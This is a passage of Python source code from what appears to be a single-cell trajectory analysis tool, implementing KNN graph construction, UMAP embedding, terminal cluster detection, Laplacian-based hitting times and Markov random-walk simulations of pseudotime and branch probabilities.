self.too_big_factor = too_big_factor ##if a cluster exceeds this share of the entire cell population, then the PARC will be run on the large cluster. at 0.4 it does not come into play
self.small_pop = small_pop # smallest cluster population to be considered a community
self.jac_weighted_edges = jac_weighted_edges
self.knn = knn
self.n_iter_leiden = n_iter_leiden
self.random_seed = random_seed # enable reproducible Leiden clustering
self.num_threads = num_threads # number of threads used in KNN search/construction
self.distance = distance # Euclidean distance 'l2' by default; other options 'ip' and 'cosine'
self.time_smallpop = time_smallpop
self.pseudotime = pseudotime
self.path = path
self.super_cluster_labels = super_cluster_labels
self.super_node_degree_list = super_node_degree_list
self.super_terminal_cells = super_terminal_cells
self.x_lazy = x_lazy # 1-x = probability of staying in same node
self.alpha_teleport = alpha_teleport # 1-alpha is probability of jumping
self.root_user = root_user
self.preserve_disconnected = preserve_disconnected
self.dataset = dataset
self.super_terminal_clusters = super_terminal_clusters
self.do_magic_bool = do_magic_bool
self.is_coarse = is_coarse
self.csr_full_graph = csr_full_graph
self.ig_full_graph = ig_full_graph
self.csr_array_pruned=csr_array_pruned
self.full_neighbor_array = full_neighbor_array
def knngraph_visual(self, data_visual,knn_umap =15, downsampled = False ):
k_umap = knn_umap
t0= time.time()
# neighbors in array are not listed in any order of proximity
if downsampled == False:
self.knn_struct.set_ef(k_umap+1)
neighbor_array, distance_array = self.knn_struct.knn_query(self.data, k=k_umap)
else:
knn_struct_umap = self.make_knn_struct(visual=True, data_visual=data_visual)
knn_struct_umap.set_ef(k_umap + 1)
neighbor_array, distance_array = knn_struct_umap.knn_query(data_visual, k=k_umap)
row_list = []
n_neighbors = neighbor_array.shape[1]
n_cells = neighbor_array.shape[0]
print('ncells and neighs', n_cells, n_neighbors)
dummy = np.transpose(np.ones((n_neighbors, n_cells)) * range(0, n_cells)).flatten()
print('dummy size' , dummy.size)
row_list.extend(list(dummy))  # reuse the row-index pattern computed above
row_min = np.min(distance_array, axis=1)
row_sigma = np.std(distance_array, axis=1)
distance_array = (distance_array - row_min[:,np.newaxis])/row_sigma[:,np.newaxis]
col_list = neighbor_array.flatten().tolist()
distance_array = distance_array.flatten()
distance_array = np.sqrt(distance_array)
distance_array = distance_array * -1
weight_list = np.exp(distance_array)
threshold = np.mean(weight_list) + 2* np.std(weight_list)
weight_list[weight_list >= threshold] = threshold
weight_list = weight_list.tolist()
print('weight list', len(weight_list))
graph = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
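# Symmetrize with the fuzzy union used by UMAP, w + w.T - w*w.T, so an edge is
# kept when it appears in either direction of the kNN graph.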
graph_transpose = graph.T
prod_matrix = graph.multiply(graph_transpose)
graph = graph_transpose + graph - prod_matrix
return graph
def run_umap_hnsw(self, X_input, graph, n_components = 2, alpha: float = 1.0,negative_sample_rate: int = 5,
gamma: float = 1.0, spread = 1.0, min_dist = 0.1,init_pos ='spectral',random_state =1,):
from umap.umap_ import find_ab_params, simplicial_set_embedding
import matplotlib.pyplot as plt
a, b = find_ab_params(spread, min_dist)
print('a,b, spread, dist', a,b,spread, min_dist)
t0 = time.time()
X_umap = simplicial_set_embedding(data = X_input, graph=graph, n_components= n_components, initial_alpha= alpha, a = a, b=b, n_epochs=0, metric_kwds={}, gamma=gamma, negative_sample_rate=negative_sample_rate, init=init_pos, random_state= np.random.RandomState(random_state), metric='euclidean', verbose = 1)
return X_umap
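# Illustrative usage (a sketch, assuming `p` is a fitted PARC instance and X is
# the matrix its knn_struct was built on):
#     graph = p.knngraph_visual(X, knn_umap=15)
#     embedding = p.run_umap_hnsw(X, graph, n_components=2)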
def get_terminal_clusters(self, A, markov_pt, root_ai):
n_ = A.shape[0]
if n_ <= 10: n_outlier_std = 3
if (n_ <= 40) & (n_ > 10):n_outlier_std = 2
if n_>=40: n_outlier_std = 1
pop_list = []
print('get terminal', set(self.labels), np.where(self.labels == 0))
for i in list(set(self.labels)):
pop_list.append(len(np.where(self.labels == i)[0]))
# we weight the out-degree based on the population of clusters to avoid allowing small clusters to become the terminals based on population alone
A_new = A.copy()
for i in range(A.shape[0]):
for j in range(A.shape[0]):
A_new[i, j] = A[i, j] * (pop_list[i] + pop_list[j]) / (pop_list[i] * pop_list[j])
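# Equivalent to A[i, j] * (1/pop_i + 1/pop_j): edges touching small clusters are
# inflated so that a small cluster does not look spuriously low-degree and get
# picked as a terminal state on population grounds alone.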
# make an igraph graph to compute the closeness
g_dis = ig.Graph.Adjacency((A_new > 0).tolist()) # need to manually add the weights as igraph treats A>0 as boolean
g_dis.es['weights'] = 1/A_new[A_new.nonzero()] #we want "distances" not weights for closeness and betweeness
betweenness_score = g_dis.betweenness(weights = 'weights')
betweenness_score_array = np.asarray(betweenness_score)
betweenness_score_takeout_outlier = betweenness_score_array[betweenness_score_array<(np.mean(betweenness_score_array)+n_outlier_std*np.std(betweenness_score_array))]
betweenness_list = [ i for i, score in enumerate(betweenness_score) if score < (np.mean(betweenness_score_takeout_outlier) - 0 * np.std(betweenness_score_takeout_outlier))]
closeness_score = g_dis.closeness( mode='ALL', cutoff=None, weights='weights', normalized=True)
closeness_score_array = np.asarray( closeness_score)
closeness_score_takeout_outlier = closeness_score_array[closeness_score_array < (np.mean( closeness_score_array) + n_outlier_std * np.std( closeness_score_array))]
closeness_list = [i for i, score in enumerate(closeness_score) if
score < (np.mean(closeness_score_takeout_outlier) - 0 * np.std(closeness_score_takeout_outlier))]
print('closeness_score ', [(i, score) for i, score in enumerate(closeness_score)])
print('closeness_score shortlist', closeness_list)
print('betweeness_score ', [(i,score) for i, score in enumerate(betweenness_score)])
print('betweeness_score shortlist', betweenness_list)
out_deg = A_new.sum(axis=1)
in_deg = A_new.sum(axis=0)
out_deg = np.asarray(out_deg)
outdegree_score_takeout_outlier = out_deg[out_deg < (np.mean(out_deg) + n_outlier_std * np.std(out_deg))]
outdeg_list = [i for i, score in enumerate(out_deg) if score < (np.mean(outdegree_score_takeout_outlier) - 0 * np.std(outdegree_score_takeout_outlier))]
markov_pt = np.asarray(markov_pt)
markov_pt_takeout_outlier = markov_pt[markov_pt < (np.mean(markov_pt) + n_outlier_std * np.std(markov_pt))]
print('number of clusters', n_)
if n_ <= 10:
loc_deg = np.where(out_deg <= np.percentile(out_deg, 50))[0]
print('low deg super', loc_deg)
loc_pt = np.where(markov_pt >= np.percentile(markov_pt, 60))[
0] # 60 Ttoy #10 for human but not sure ever in play
loc_deg_in = np.where(in_deg <= np.percentile(in_deg, 10))[0]
print('high pt super', loc_pt)
if (n_ <= 40) & (n_ > 10):
loc_deg = np.where(out_deg <= np.percentile(out_deg, 50))[
0] # np.mean(out_deg[out_deg>(np.mean(out_deg)-1*np.std(out_deg))]))[0]#np.percentile(out_deg, 50))[0]#np.mean(out_deg[out_deg>(np.mean(out_deg)-1*np.std(out_deg))]))[0]#np.percentile(out_deg, 50))[0] # 30 for Toy #was 50 for Human
loc_deg_in = np.where(in_deg <= np.percentile(in_deg, 20))[0]
print('low deg super', loc_deg)
print('low in-deg super', loc_deg_in)
loc_pt = np.where(markov_pt >= np.percentile(markov_pt, 10))[0] # 60 Toy #10 Human
print('high pt super', loc_pt)
if n_ > 40:
loc_deg = np.where(out_deg <= np.percentile(out_deg, 50))[0] # 15 Toy
print('low deg', loc_deg)
loc_pt = np.where(markov_pt >= np.percentile(markov_pt, 40))[0] # 60Toy #30 Human
print('high pt', loc_pt)
loc_deg_in = np.where(in_deg <= np.percentile(in_deg, 10))[0]
loc_deg = outdeg_list
terminal_clusters_1 = list(set(closeness_list)&set(betweenness_list))
terminal_clusters_2 = list(set(closeness_list) & set(loc_deg))
terminal_clusters_3 = list(set(betweenness_list) & set(loc_deg))
terminal_clusters = list(set(terminal_clusters_1)|set(terminal_clusters_2))
terminal_clusters = list(set(terminal_clusters)|set(terminal_clusters_3))
terminal_clusters = list(set(terminal_clusters) & set(loc_pt))
terminal_org = terminal_clusters.copy()
print('original terminal clusters', terminal_org)
for terminal_i in terminal_org:
removed_terminal_i = False
# print('terminal state', terminal_i)
count_nn = 0
neigh_terminal = np.where(A[:, terminal_i] > 0)[0]
if neigh_terminal.size > 0:
for item in neigh_terminal:
# print('terminal state', terminal_i)
if item in terminal_clusters:
print('item and terminal',
item, terminal_clusters)
count_nn = count_nn + 1
if item == root_ai: # if the terminal state is a neighbor of
terminal_clusters.remove(terminal_i)
print('we removed cluster', terminal_i, 'from the shortlist of terminal states ')
removed_terminal_i = True
if count_nn >= 3:
if removed_terminal_i == False: terminal_clusters.remove(terminal_i)
print('TS', terminal_i, 'had 3 or more neighboring terminal states')
print('terminal_clusters', terminal_clusters)
return terminal_clusters
def compute_hitting_time(self, sparse_graph, root, x_lazy, alpha_teleport, number_eig=0):
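        # Computes expected hitting times from the root node to every other node on the cluster graph.
        # The normalized graph Laplacian is eigendecomposed and the Green's function (inverse of the
        # beta-normalized Laplacian) is assembled term by term; x_lazy and alpha_teleport control the
        # laziness and teleportation of the random walk. Returns (hitting times from root, roundtrip commute times).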
        # 1 - alpha_teleport is the probability of teleporting
        # 1 - x_lazy is the probability of staying in the current state (being lazy)
beta_teleport = 2 * (1 - alpha_teleport) / (2 - alpha_teleport)
N = sparse_graph.shape[0]
# print('adjacency in compute hitting', sparse_graph)
# sparse_graph = scipy.sparse.csr_matrix(sparse_graph)
print('start compute hitting')
A = scipy.sparse.csr_matrix.todense(sparse_graph) # A is the adjacency matrix
print('is graph symmetric', (A.transpose() == A).all())
lap = csgraph.laplacian(sparse_graph,
normed=False) # compute regular laplacian (normed = False) to infer the degree matrix where D = L+A
# see example and definition in the SciPy ref https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.csgraph.laplacian.html
A = scipy.sparse.csr_matrix.todense(lap)
print('is laplacian symmetric', (A.transpose() == A).all())
deg = sparse_graph + lap # Recall that L=D-A (modified for weighted where D_ii is sum of edge weights and A_ij is the weight of particular edge)
deg.data = 1 / np.sqrt(deg.data) ##inv sqrt of degree matrix
deg[deg == np.inf] = 0
norm_lap = csgraph.laplacian(sparse_graph, normed=True) # returns symmetric normalized D^-.5 xL x D^-.5
Id = np.zeros((N, N), float)
np.fill_diagonal(Id, 1)
norm_lap = scipy.sparse.csr_matrix.todense(norm_lap)
        eig_val, eig_vec = np.linalg.eig(
            norm_lap)  # eig_vec[:, i] is the eigenvector for eigenvalue eig_val[i]; np.linalg.eigh is not used as it applies only to symmetric matrices, and the eigenvectors are not returned in descending order
# print('eig val', eig_val.shape, eig_val)
if number_eig == 0: number_eig = eig_vec.shape[1]
# print('number of eig vec', number_eig)
Greens_matrix = np.zeros((N, N), float)
beta_norm_lap = np.zeros((N, N), float)
Xu = np.zeros((N, N))
Xu[:, root] = 1
Id_Xv = np.zeros((N, N), int)
np.fill_diagonal(Id_Xv, 1)
Xv_Xu = Id_Xv - Xu
start_ = 0
if alpha_teleport == 1:
start_ = 1 # if there are no jumps (alph_teleport ==1), then the first term in beta-normalized Green's function will have 0 in denominator (first eigenvalue==0)
for i in range(start_, number_eig): # 0 instead of 1th eg
vec_i = eig_vec[:, i]
factor = beta_teleport + 2 * eig_val[i] * x_lazy * (1 - beta_teleport)
vec_i = np.reshape(vec_i, (-1, 1))
eigen_vec_mult = vec_i.dot(vec_i.T)
Greens_matrix = Greens_matrix + (
eigen_vec_mult / factor) # Greens function is the inverse of the beta-normalized laplacian
beta_norm_lap = beta_norm_lap + (eigen_vec_mult * factor) # beta-normalized laplacian
deg = scipy.sparse.csr_matrix.todense(deg)
temp = Greens_matrix.dot(deg)
temp = deg.dot(temp) * beta_teleport
hitting_matrix = np.zeros((N, N), float)
diag_row = np.diagonal(temp)
for i in range(N):
hitting_matrix[i, :] = diag_row - temp[i, :]
roundtrip_commute_matrix = hitting_matrix + hitting_matrix.T
temp = Xv_Xu.dot(temp)
final_hitting_times = np.diagonal(
temp) ## number_eig x 1 vector of hitting times from root (u) to number_eig of other nodes
roundtrip_times = roundtrip_commute_matrix[root, :]
return abs(final_hitting_times), roundtrip_times
def prob_reaching_terminal_state1(self, terminal_state, all_terminal_states, A, root, pt, num_sim,q,cumstateChangeHist, cumstateChangeHist_all,seed):
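        # Monte Carlo worker: simulates num_sim random walks on the row-normalized transition matrix,
        # starting at the root. cumstateChangeHist accumulates the per-state visit indicator for walks that
        # reach terminal_state, while cumstateChangeHist_all accumulates it over the simulated walks.
        # The pair of accumulators is appended to the shared list q for aggregation by the parent process.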
np.random.seed(seed)
n_states = A.shape[0]
n_components, labels = connected_components(csgraph=csr_matrix(A), directed=False)
A = A / (np.max(A))
# A[A<=0.05]=0
jj = 0
for row in A:
if np.all(row == 0): A[jj, jj] = 1
jj = jj + 1
P = A / A.sum(axis=1).reshape((n_states, 1))
# if P.shape[0]>16:
# print("P 16", P[:,16])
n_steps = int(2* n_states) # 2
currentState = root
state = np.zeros((1, n_states))
state[0, currentState] = 1
state_root = state.copy()
neigh_terminal = np.where(A[:, terminal_state] > 0)[0]
non_nn_terminal_state = []
for ts_i in all_terminal_states:
if pt[ts_i] > pt[terminal_state]: non_nn_terminal_state.append(ts_i)
for ts_i in all_terminal_states:
if np.all(neigh_terminal != ts_i): non_nn_terminal_state.append(ts_i)
# print(ts_i, 'is a non-neighbor terminal state to the target terminal', terminal_state)
#cumstateChangeHist = np.zeros((1, n_states))
#cumstateChangeHist_all = np.zeros((1, n_states))
count_reach_terminal_state = 0
count_r = 0
for i in range(num_sim):
# distr_hist = [[0 for i in range(n_states)]]
stateChangeHist = np.zeros((n_states, n_states))
stateChangeHist[root, root] = 1
state = state_root
currentState = root
stateHist = state
terminal_state_found = False
non_neighbor_terminal_state_reached = False
# print('root', root)
# print('terminal state target', terminal_state)
x = 0
while (x < n_steps) & (
(terminal_state_found == False)): # & (non_neighbor_terminal_state_reached == False)):
currentRow = np.ma.masked_values((P[currentState]), 0.0)
nextState = simulate_multinomial(currentRow)
# print('next state', nextState)
if nextState == terminal_state:
terminal_state_found = True
count_r = count_r+1
# print('terminal state found at step', x)
# if nextState in non_nn_terminal_state:
# non_neighbor_terminal_state_reached = True
# Keep track of state changes
stateChangeHist[currentState, nextState] += 1
# Keep track of the state vector itself
state = np.zeros((1, n_states))
state[0, nextState] = 1.0
# Keep track of state history
stateHist = np.append(stateHist, state, axis=0)
currentState = nextState
x = x + 1
if (terminal_state_found == True):
cumstateChangeHist = cumstateChangeHist + np.any(
stateChangeHist > 0, axis=0)
count_reach_terminal_state = count_reach_terminal_state + 1
cumstateChangeHist_all = cumstateChangeHist_all + np.any(
stateChangeHist > 0, axis=0)
# avoid division by zero on states that were never reached (e.g. terminal states that come after the target terminal state)
cumstateChangeHist_all[cumstateChangeHist_all == 0] = 1
prob_ = cumstateChangeHist / cumstateChangeHist_all
np.set_printoptions(precision=3)
q.append([cumstateChangeHist, cumstateChangeHist_all])
def simulate_markov_sub(self, A, num_sim, hitting_array, q, root):
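        # Monte Carlo worker used by simulate_markov(): simulates num_sim random walks of length 2 * n_states
        # from the root and records, for each state, the accumulated (logistic-transformed) edge-weight distance
        # along the walk up to the step at which that state was first reached. States never reached in a walk
        # receive the dummy value n_steps + 1. The per-walk results are appended to the shared list q.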
n_states = A.shape[0]
P = A / A.sum(axis=1).reshape((n_states, 1))
# hitting_array = np.ones((P.shape[0], 1)) * 1000
hitting_array_temp = np.zeros((P.shape[0], 1)).astype('float64')
n_steps = int(2 * n_states)
hitting_array_final = np.zeros((1, n_states))
currentState = root
print('root is', root)
state = np.zeros((1, n_states))
state[0, currentState] = 1
state_root = state.copy()
for i in range(num_sim):
dist_list = []
# print(i, 'th simulation in Markov')
# if i % 10 == 0: print(i, 'th simulation in Markov', time.ctime())
state = state_root
currentState = root
stateHist = state
for x in range(n_steps):
currentRow = np.ma.masked_values((P[currentState]), 0.0)
nextState = simulate_multinomial(currentRow)
dist = A[currentState, nextState]
dist = (1 / ((1 + math.exp((dist - 1)))))
dist_list.append(dist)
# print('next state', nextState)
# Keep track of state changes
# stateChangeHist[currentState,nextState]+=1
# Keep track of the state vector itself
state = np.zeros((1, n_states))
state[0, nextState] = 1.0
currentState = nextState
# Keep track of state history
stateHist = np.append(stateHist, state, axis=0)
for state_i in range(P.shape[0]):
# print('first reach state', state_i, 'at step', np.where(stateHist[:, state_i] == 1)[0][0])
first_time_at_statei = np.where(stateHist[:, state_i] == 1)[0]
if len(first_time_at_statei) == 0:
# print('did not reach state', state_i,'setting dummy path length')
hitting_array_temp[state_i, 0] = n_steps + 1
else:
total_dist = 0
for ff in range(first_time_at_statei[0]):
total_dist = dist_list[ff] + total_dist
hitting_array_temp[state_i, 0] = total_dist # first_time_at_statei[0]
# hitting_array_temp[hitting_array_temp==(n_steps+1)] = np.mean(hitting_array_temp[hitting_array_temp!=n_steps+1])
hitting_array = np.append(hitting_array, hitting_array_temp, axis=1)
# print('hitting temp', hitting_array_temp)
# if i % 100 == 0: print(i, 'th','has hitting temp', hitting_array_temp.flatten())
hitting_array = hitting_array[:, 1:]
q.append(hitting_array)
def simulate_branch_probability(self, terminal_state, all_terminal_states, A, root, pt, num_sim=300 ):
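        # Estimates the probability that a random walk starting at the root reaches the target terminal_state.
        # The simulations are split across up to 5 worker processes (prob_reaching_terminal_state1); the
        # visit-count accumulators are summed, normalized and rescaled, and the per-cluster probabilities returned.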
print('root', root)
print('terminal state target', terminal_state)
n_states = A.shape[0]
ncpu = multiprocessing.cpu_count()
if (ncpu == 1) | (ncpu == 2):
n_jobs = 1
elif ncpu > 2:
n_jobs = min(ncpu - 1, 5)
print('njobs', n_jobs)
num_sim_pp = int(num_sim / n_jobs) # num of simulations per process
print('num_sim_pp', num_sim_pp)
jobs = []
manager = multiprocessing.Manager()
q = manager.list()
seed_list = list(range(n_jobs))
for i in range(n_jobs):
cumstateChangeHist = np.zeros((1, n_states))
cumstateChangeHist_all = np.zeros((1, n_states))
process = multiprocessing.Process(target=self.prob_reaching_terminal_state1,args=(terminal_state, all_terminal_states, A, root, pt, num_sim_pp,q, cumstateChangeHist, cumstateChangeHist_all, seed_list[i]))
jobs.append(process)
for j in jobs:
j.start()
for j in jobs:
j.join()
cumhistory_vec = q[0][0]
cumhistory_vec_all = q[0][1]
count_reached= cumhistory_vec_all[0,terminal_state]
for i in range(1,len(q)):#[1,2,3,4]:
#for qi in q[1:]:
cumhistory_vec = cumhistory_vec + q[i][0]
cumhistory_vec_all = cumhistory_vec_all+ q[i][1]
#hitting_array = np.append(hitting_array, qi, axis=1) # .get(), axis=1)
count_reached = count_reached+ q[i][1][0,terminal_state]
print('accumulated number of times Terminal state',terminal_state, 'is found:',count_reached)
#print('cumhistory_vec', cumhistory_vec)
#print('cumhistory_vec_all', cumhistory_vec_all)
cumhistory_vec_all[cumhistory_vec_all == 0] = 1
prob_ = cumhistory_vec /cumhistory_vec_all
np.set_printoptions(precision=3)
#print('prob', prob_)
if count_reached == 0:
prob_[:, terminal_state] = 0
print('never reached state', terminal_state)
else:
loc_1 = np.where(prob_ == 1)
loc_1 = loc_1[1]
print('loc_1', loc_1)
# prob_[0, terminal_state] = 0 # starting at the root, index=0
prob_[0, loc_1] = 0
#print('zerod out prob', prob_)
temp_ = np.max(prob_)
            if temp_ == 0: temp_ = 1  # guard against division by zero in the rescaling below
prob_ = prob_ / min(1,1.1 * temp_)
# prob_[0, terminal_state] = 1
prob_[0, loc_1] = 1
#prob_ = np.sqrt(prob_)
print('np.max', np.max(prob_))
#prob_ = prob_/np.max(prob_)
print('scaled prob', prob_)
return list(prob_)[0]
def simulate_markov(self, A, root):
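        # Estimates cluster-level pseudotime by simulating random walks from the root on the biased
        # cluster-graph transition matrix. Work is split across processes (simulate_markov_sub) and each
        # state's hitting time is summarized as the mean of its fastest arrivals (at or below the 15th percentile).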
n_states = A.shape[0]
P = A / A.sum(axis=1).reshape((n_states, 1))
# print('row normed P',P.shape, P, P.sum(axis=1))
x_lazy = self.x_lazy # 1-x is prob lazy
alpha_teleport = self.alpha_teleport
# bias_P is the transition probability matrix
# P = x_lazy * P + (1 - x_lazy) * np.identity(n_states)
# print(P, P.sum(axis=1))
# P = alpha_teleport * P + ((1 - alpha_teleport) * (1 / n_states) * (np.ones((n_states, n_states))))
# print('check prob of each row sum to one', P.sum(axis=1))
currentState = root
state = np.zeros((1, n_states))
state[0, currentState] = 1
state_root = state.copy()
stateHist = state
dfStateHist = pd.DataFrame(state)
distr_hist = np.zeros([1, n_states])
num_sim = 1300 # 1000 # 1300
ncpu = multiprocessing.cpu_count()
if (ncpu == 1) | (ncpu == 2):
n_jobs = 1
elif ncpu > 2:
n_jobs = min(ncpu - 1, 5)
print('njobs', n_jobs)
num_sim_pp = int(num_sim / n_jobs) # num of simulations per process
print('num_sim_pp', num_sim_pp)
n_steps = int(2 * n_states)
jobs = []
manager = multiprocessing.Manager()
q = manager.list()
for i in range(n_jobs):
hitting_array = np.ones((P.shape[0], 1)) * 1000
process = multiprocessing.Process(target=self.simulate_markov_sub,
args=(P, num_sim_pp, hitting_array, q, root))
jobs.append(process)
for j in jobs:
j.start()
for j in jobs:
j.join()
print('ended all multiprocesses, will retrieve and reshape')
hitting_array = q[0]
for qi in q[1:]:
hitting_array = np.append(hitting_array, qi, axis=1) # .get(), axis=1)
print('finished getting from queue', hitting_array.shape)
hitting_array_final = np.zeros((1, n_states))
no_times_state_reached_array = np.zeros((1, n_states))
for i in range(n_states):
rowtemp = hitting_array[i, :]
no_times_state_reached_array[0, i] = np.sum(rowtemp != (n_steps + 1))
lower_quart = np.percentile(no_times_state_reached_array, 25)
# loc_rarely_reached = np.where(no_times_state_reached_array<= upper_quart)
# print('rarely reached clus', loc_rarely_reached, upper_quart, no_times_state_reached_array)
for i in range(n_states):
rowtemp = hitting_array[i, :]
no_times_state_reached = np.sum(rowtemp != (n_steps + 1))
if no_times_state_reached != 0:
# print('the number of times state ',i, 'has been reached is', no_times_state_reached )
# if no_times_state_reached < lower_quart:
# perc = np.percentile(rowtemp[rowtemp != n_steps + 1], 5) + 0.001
# print('in lower quart for state', i)
perc = np.percentile(rowtemp[rowtemp != n_steps + 1], 15) + 0.001 # 15 for Human and Toy
# print('state ', i,' has perc' ,perc)
# print('smaller than perc', rowtemp[rowtemp <= perc])
# hitting_array_final[0, i] = np.min(rowtemp[rowtemp != (n_steps + 1)])
hitting_array_final[0, i] = np.mean(rowtemp[rowtemp <= perc])
else:
hitting_array_final[0, i] = (n_steps + 1)
# hitting_array=np.mean(hitting_array, axis=1)
print('hitting from sim markov', [(i, val) for i, val in enumerate(hitting_array_final.flatten())])
return hitting_array_final[0]
def compute_hitting_time_onbias(self, laplacian, inv_sqr_deg, root, x_lazy, alpha_teleport, number_eig=0):
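        # Variant of compute_hitting_time() that operates on a precomputed (biased) Laplacian and its
        # inverse square-root degree matrix rather than building them from the adjacency matrix.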
        # 1 - alpha_teleport is the probability of teleporting
        # 1 - x_lazy is the probability of staying in the current state (being lazy)
beta_teleport = 2 * (1 - alpha_teleport) / (2 - alpha_teleport)
N = laplacian.shape[0]
print('is laplacian of biased symmetric', (laplacian.transpose() == laplacian).all())
Id = np.zeros((N, N), float)
np.fill_diagonal(Id, 1)
# norm_lap = scipy.sparse.csr_matrix.todense(laplacian)
        eig_val, eig_vec = np.linalg.eig(
            laplacian)  # eig_vec[:, i] is the eigenvector for eigenvalue eig_val[i]; np.linalg.eigh is not used as it applies only to symmetric matrices, and the eigenvectors are not returned in descending order
print('eig val', eig_val.shape)
if number_eig == 0: number_eig = eig_vec.shape[1]
print('number of eig vec', number_eig)
Greens_matrix = np.zeros((N, N), float)
beta_norm_lap = np.zeros((N, N), float)
Xu = np.zeros((N, N))
Xu[:, root] = 1
Id_Xv = np.zeros((N, N), int)
np.fill_diagonal(Id_Xv, 1)
Xv_Xu = Id_Xv - Xu
start_ = 0
if alpha_teleport == 1:
start_ = 1 # if there are no jumps (alph_teleport ==1), then the first term in beta-normalized Green's function will have 0 in denominator (first eigenvalue==0)
for i in range(start_, number_eig): # 0 instead of 1th eg
# print(i, 'th eigenvalue is', eig_val[i])
vec_i = eig_vec[:, i]
factor = beta_teleport + 2 * eig_val[i] * x_lazy * (1 - beta_teleport)
# print('factor', 1 / factor)
vec_i = np.reshape(vec_i, (-1, 1))
eigen_vec_mult = vec_i.dot(vec_i.T)
Greens_matrix = Greens_matrix + (
eigen_vec_mult / factor) # Greens function is the inverse of the beta-normalized laplacian
beta_norm_lap = beta_norm_lap + (eigen_vec_mult * factor) # beta-normalized laplacian
temp = Greens_matrix.dot(inv_sqr_deg)
temp = inv_sqr_deg.dot(temp) * beta_teleport
hitting_matrix = np.zeros((N, N), float)
diag_row = np.diagonal(temp)
for i in range(N):
hitting_matrix[i, :] = diag_row - temp[i, :]
roundtrip_commute_matrix = hitting_matrix + hitting_matrix.T
temp = Xv_Xu.dot(temp)
final_hitting_times = np.diagonal(
temp) ## number_eig x 1 vector of hitting times from root (u) to number_eig of other nodes
roundtrip_times = roundtrip_commute_matrix[root, :]
return abs(final_hitting_times), roundtrip_times
def project_hittingtimes_sc(self, pt):
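        # Projects cluster-level pseudotime (pt) onto single cells: each cell's value is the average of the
        # pseudotimes of the clusters represented among its knn_sc nearest neighbors, weighted by frequency.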
        knn_sc = 10  # number of nearest neighbors used to project cluster-level values onto single cells (currently the same for large and small datasets)
neighbor_array, distance_array = self.knn_struct.knn_query(self.data, k=knn_sc)
print('shape of neighbor in project onto sc', neighbor_array.shape)
labels = np.asarray(self.labels)
sc_pt = np.zeros((len(self.labels),))
i = 0
for row in neighbor_array:
mean_weight = 0
# print('row in neighbor array of cells', row, labels.shape)
neighboring_clus = labels[row]
# print('neighbor clusters labels', neighboring_clus)
for clus_i in set(list(neighboring_clus)):
hitting_time_clus_i = pt[clus_i]
num_clus_i = np.sum(neighboring_clus == clus_i)
#if clus_i == self.root[0]: print('root is a neighbor', pt[clus_i], 'num NN cells beloning to root', num_clus_i)
# print('hitting and num_clus for Clusi', hitting_time_clus_i, num_clus_i)
mean_weight = mean_weight + hitting_time_clus_i * num_clus_i / knn_sc
# print('mean weight',mean_weight)
sc_pt[i] = mean_weight
#if self.root[0] in set(list(neighboring_clus)): print('the mean sc time for root neighbor is', mean_weight)
i = i + 1
return sc_pt
def project_branch_probability_sc(self, bp_array_clus, pt):
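        # Projects cluster-level branch probabilities (bp_array_clus) and pseudotime onto single cells using
        # a cells-by-clusters weight matrix built from each cell's knn_sc nearest neighbors.
        # Results are stored in self.single_cell_bp and self.single_cell_pt_markov.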
        knn_sc = 10  # number of nearest neighbors used to project cluster-level values onto single cells (currently the same for large and small datasets)
neighbor_array, distance_array = self.knn_struct.knn_query(self.data, k=knn_sc)
print('shape of neighbor in project onto sc', neighbor_array.shape)
labels = np.asarray(self.labels)
n_clus = len(list(set(labels)))
weight_array = np.zeros((len(labels), n_clus))
for irow, row in enumerate(neighbor_array):
mean_weight = 0
#print('row in neighbor array of cells', row, labels.shape)
neighboring_clus = labels[row]
for clus_i in set(list(neighboring_clus)):
# hitting_time_clus_i = df_graph[clus_i]
num_clus_i = np.sum(neighboring_clus == clus_i)
# print('hitting and num_clus for Clusi', hitting_time_clus_i, num_clus_i)
wi = num_clus_i / knn_sc
weight_array[irow, clus_i] = wi
# print('mean weight',mean_weight)
#print('rowi of weight array', weight_array[irow,:])
#print('shape weight array', weight_array)
#print(weight_array)
bp_array_sc = weight_array.dot(bp_array_clus)
bp_array_sc = bp_array_sc * 1. / np.max(bp_array_sc, axis=0) #divide cell by max value in that column
#print('column max:',np.max(bp_array_sc, axis=0))
#print('sc bp array max', np.max(bp_array_sc))
#bp_array_sc = bp_array_sc/np.max(bp_array_sc)
for i, label_ts in enumerate(list(self.terminal_clusters)):
loc_i = np.where(np.asarray(self.labels) == label_ts)[0]
loc_noti = np.where(np.asarray(self.labels) != label_ts)[0]
if np.max(bp_array_sc[loc_noti,i])>0.8: bp_array_sc[loc_i,i]=1.2
pt = np.asarray(pt)
pt = np.reshape(pt, (n_clus,1))
pt_sc = weight_array.dot(pt)
self.single_cell_bp = bp_array_sc
self.single_cell_pt_markov = pt_sc.flatten()
return
def make_knn_struct(self, too_big=False, big_cluster=None, visual = False, data_visual = None):
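        # Builds an hnswlib approximate nearest-neighbor index on self.data (or on big_cluster / data_visual).
        # Index parameters (ef_construction, M) are chosen based on the number of samples and dimensions.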
if visual == False: data = self.data
else: data = data_visual
if self.knn > 190: print(colored('please provide a lower K_in for KNN graph construction','red'))
        ef_query = max(100, self.knn + 1)  # ef should always be > K; a higher ef gives a more accurate query
if too_big == False:
num_dims = data.shape[1]
n_elements = data.shape[0]
p = hnswlib.Index(space=self.distance, dim=num_dims) # default to Euclidean distance
p.set_num_threads(self.num_threads) # allow user to set threads used in KNN construction
if n_elements < 10000:
ef_param_const = min(n_elements - 10, 500)
ef_query = ef_param_const
                print('setting ef_construction to', ef_param_const)
else:
ef_param_const = 200
if (num_dims > 30) & (n_elements<=50000) :
p.init_index(max_elements=n_elements, ef_construction=ef_param_const,
M=48) ## good for scRNA seq where dimensionality is high
else:
p.init_index(max_elements=n_elements, ef_construction=ef_param_const, M=30 )
p.add_items(data)
if too_big == True:
num_dims = big_cluster.shape[1]
n_elements = big_cluster.shape[0]
p = hnswlib.Index(space='l2', dim=num_dims)
p.init_index(max_elements=n_elements, ef_construction=200, M=30)
p.add_items(big_cluster)
p.set_ef(ef_query) # ef should always be > k
return p
def make_csrmatrix_noselfloop(self, neighbor_array, distance_array, auto_ = True):
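        # Converts the KNN query results into a sparse affinity graph (csr_matrix) without self-loops.
        # When local pruning is enabled, edges longer than mean + dist_std_local * std of each cell's neighbor
        # distances are discarded; edge weights are inverse distances rescaled by the mean distance.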
if auto_ == True:
local_pruning_bool = not (self.keep_all_local_dist)
            if local_pruning_bool == True: print(colored('commencing local pruning based on l2 (squared) distance at', 'blue'),
